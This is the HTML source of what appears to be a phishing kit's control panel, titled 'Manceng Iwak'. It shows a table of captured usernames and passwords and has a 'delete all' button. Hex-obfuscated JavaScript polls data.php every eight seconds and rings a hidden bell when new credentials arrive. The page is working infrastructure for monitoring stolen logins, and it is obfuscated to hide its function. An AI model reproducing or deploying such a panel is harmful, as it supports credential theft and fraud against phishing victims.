<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<title>Manceng Iwak</title>
	<meta http-equiv="Content-Type" content="text/html; charset=SHIFT_JIS"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="viewport" content="width=device-width, initial-scale=1"/>
    <link rel="stylesheet" type="text/css" href="./lib/style.css">
    <script src="//code.jquery.com/jquery-3.3.1.min.js"></script>
    <script src="//maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
    <script src="//code.jquery.com/jquery-1.9.1.min.js"></script>
</head>
<body>
<center>
<body style="padding-top:10px;">
<div class="container" style="width: 700px;">
<div class="group-btn text-left">
			<tr>
			  <td>
			  <tr>
		   </tr>
		</table>
	</form>
		<thead>
            <table id="ngelead" width="100%" border="0" cellspacing="1" cellpadding="2" bgcolor="#CCCCCC" style="text-align: center;">
			<td bgcolor="#d82a24" width="1%" align="center"><font color="#FFFFFF"><b>No</th>
			<td bgcolor="#d82a24" width="15%" align="center"><font color="#FFFFFF"><b>Username</th>
			<td bgcolor="#d82a24" width="15%" align="center"><font color="#FFFFFF"><b>Password</th>
			<td bgcolor="#d82a24" width="5%" align="center"><font color="#FFFFFF"><b>Actions</th>
			<td bgcolor="#d82a24" width="10%" align="center"><font color="#FFFFFF"><b><b><center><a href="del.php"><button class='btn'>Hapos Kabeh</button></th>
                    </tr>
                </thead>
                <tbody id="iyo"></tbody>
            </table>
        </div>
    </div>
</div>
<audio id="jaran" controls style="display: none;">
  <source src="lib/bell_ring.aac" type="audio/aac">
  <source src="lib/bell_ring.mp3" type="audio/mp3">
</audio>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
<script type="text/javascript">
var _0xa780=["","\x47\x45\x54","\x64\x61\x74\x61\x2E\x70\x68\x70","\x68\x74\x6D\x6C","\x6A\x61\x72\x61\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x70\x6C\x61\x79","\x6C\x6F\x61\x64","\x23\x69\x79\x6F","\x61\x6A\x61\x78","\x72\x65\x61\x64\x79"];var lastResponse=_0xa780[0];setInterval(function(){$[_0xa780[9]]({type:_0xa780[1],url:_0xa780[2],dataType:_0xa780[3],success:function(_0x9202x2){if(lastResponse&& _0x9202x2!== lastResponse){var _0x9202x3=document[_0xa780[5]](_0xa780[4]);_0x9202x3[_0xa780[6]]();$(_0xa780[8])[_0xa780[7]](_0xa780[2])};lastResponse= _0x9202x2}})},8000);$(document)[_0xa780[10]](function(){$(_0xa780[8])[_0xa780[7]](_0xa780[2])})
</script>
<br></br>